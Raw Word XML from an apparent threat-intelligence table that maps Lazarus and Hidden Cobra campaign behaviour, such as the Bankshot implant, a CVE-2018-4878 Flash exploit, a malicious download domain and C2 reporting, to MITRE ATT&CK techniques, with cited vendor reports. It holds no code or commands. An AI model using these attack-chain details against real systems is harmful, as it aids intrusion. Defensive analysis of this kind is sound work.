          <w:p w14:paraId="16714BC3" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE86E0D" w14:textId="1FB72F6C" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3B3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ED74358" w14:textId="024D6CCB" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="002E566D" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733F4096" w14:textId="6DA389B9" w:rsidR="006115B2" w:rsidRDefault="003E6738" w:rsidP="006115B2">
            <w:r>
              <w:t>This is an example. Execution will have a goal assume further discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E6738" w:rsidRPr="004A37AE" w14:paraId="754FF10D" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB5788D" w14:textId="787BD45E" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDE6A99" w14:textId="2EEDEB25" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="003D1798" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65AC6451" w14:textId="6CF1AD54" w:rsidR="003E6738" w:rsidRPr="0035641D" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1087.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219177A1" w14:textId="47320E9C" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A72D29" w14:textId="77777777" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C7C5748" w14:textId="77777777" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD3B3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492D59BF" w14:textId="4AC84CDB" w:rsidR="003E6738" w:rsidRPr="004A37AE" w:rsidRDefault="00537EED" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00A608CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD8C023" w14:textId="77777777" w:rsidR="003E6738" w:rsidRDefault="003E6738" w:rsidP="00EE0C91">
            <w:r>
              <w:t>This is an example. Execution will have a goal assume further discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="004A37AE" w14:paraId="36CD064D" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9F20AB" w14:textId="29B0A358" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB50A4D" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">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7F58FF11" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="0035641D" w:rsidRDefault="006115B2" w:rsidP="006115B2">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143E19E0" w14:textId="2634CFFE" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="00BD3B3A" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="003E6738">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307D77B9" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71B5BC89" w14:textId="51A2FD21" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D737307" w14:textId="4CD8790B" w:rsidR="006115B2" w:rsidRPr="004A37AE" w:rsidRDefault="008F682F" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4110A66A" w14:textId="77777777" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:r>
              <w:t>After every action is performed the malware sends a response to the control server indicating whether the action was successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006115B2" w:rsidRPr="002D1D50" w14:paraId="7F27684C" w14:textId="77777777" w:rsidTr="006115B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="670F2F4A" w14:textId="77777777" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C961A20" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35751B36" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A1BB6F" w14:textId="77777777" w:rsidR="006115B2" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79FCDDD0" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582B7E82" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FA082D8" w14:textId="47E5DBBB" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC8530F" w14:textId="77777777" w:rsidR="006115B2" w:rsidRPr="002D1D50" w:rsidRDefault="006115B2" w:rsidP="006115B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BD5D863" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="0077286F" w:rsidRDefault="00C37023" w:rsidP="00C37023"/>
    <w:p w14:paraId="05DB519E" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="00C94979" w:rsidRDefault="00C37023" w:rsidP="00C37023"/>
    <w:p w14:paraId="49D6D36B" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023">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7C8054BD" w14:textId="0BC1B3D4" w:rsidR="00C37023" w:rsidRDefault="00BB679C" w:rsidP="00440BD4">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant | McAfee Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E11FE">
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7668A1BB" w14:textId="3E3EF75A" w:rsidR="00BB679C" w:rsidRDefault="00BB679C" w:rsidP="00440BD4">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Lazarus targets </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>defense</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> industry with </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ThreatNeedle</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="006E11FE">
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520663DA" w14:textId="34EC9E85" w:rsidR="00BB679C" w:rsidRDefault="00BB679C" w:rsidP="00440BD4">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Operation (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>노스</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>스타</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>) North Star A Job Offer That’s Too Good to be True? | McAfee Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E11FE">
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB91CD" w14:textId="13D36CE4" w:rsidR="00BB679C" w:rsidRDefault="00BB679C" w:rsidP="00440BD4">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign (malwarebytes.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E11FE">
        <w:t xml:space="preserve"> [2022] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F094437" w14:textId="5187FE0F" w:rsidR="00BB679C" w:rsidRDefault="00BB679C" w:rsidP="00440BD4">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>LolZarus</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: Lazarus Group Incorporating </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Lolbins</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> into Campaigns | Qualys Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E11FE">
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B1647" w14:textId="77777777" w:rsidR="005E0C97" w:rsidRDefault="005E0C97"/>
    <w:p w14:paraId="46BB7496" w14:textId="77777777" w:rsidR="005E0C97" w:rsidRDefault="005E0C97"/>
    <w:p w14:paraId="41D066C7" w14:textId="77777777" w:rsidR="005E0C97" w:rsidRDefault="005E0C97">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0C97">
        <w:t>On February 28, the McAfee Advanced Threat Research team discovered that the cybercrime group Hidden Cobra continues to target cryptocurrency and financial organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C74FBC1" w14:textId="77777777" w:rsidR="005E0C97" w:rsidRDefault="005E0C97">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0C97">
        <w:t>In this new, aggressive campaign we see a return of the Bankshot implant, which last appeared in 2017. Bankshot is designed to persist on a victim’s network for further exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E0A81" w14:textId="0CF4695F" w:rsidR="009143CE" w:rsidRDefault="005E0C97">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0C97">
        <w:t xml:space="preserve">Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0C97">
        <w:t>containing a malicious Microsoft Word document</w:t>
      </w:r>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002 : User Execution : Malicious File</w:t>
      </w:r>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0C97">
        <w:t>. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency. The exploit, which takes advantage of CVE-2018-4878, allows an attacker to execute arbitrary code such as an implant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BA6A3" w14:textId="130899AA" w:rsidR="009143CE" w:rsidRDefault="009143CE">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t>The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io.</w:t>
      </w:r>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0046642C">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1203 : Exploitation for Client Execution </w:t>
      </w:r>
      <w:r w:rsidR="004A37AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004A37AE" w:rsidRPr="002D1D50">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1105 Ingress Tool Transfer</w:t>
      </w:r>
      <w:r w:rsidR="004A37AE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046642C" w:rsidRPr="0046642C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36460069" w14:textId="3B50BB10" w:rsidR="009143CE" w:rsidRDefault="009143CE">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t xml:space="preserve">The implants (DLLs) are disguised as ZIP files </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E21A04">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00E21A04" w:rsidRPr="00E21A04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E21A04" w:rsidRPr="00E21A04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1036 Masquerading</w:t>
      </w:r>
      <w:r w:rsidR="00E21A04">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t>and communicate with three control servers, two of them Chinese-language online gambling sites</w:t>
      </w:r>
      <w:r w:rsidR="00015AC1">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00015AC1" w:rsidRPr="00AC1880">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1102.002 : &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
      <w:r w:rsidR="00015AC1">
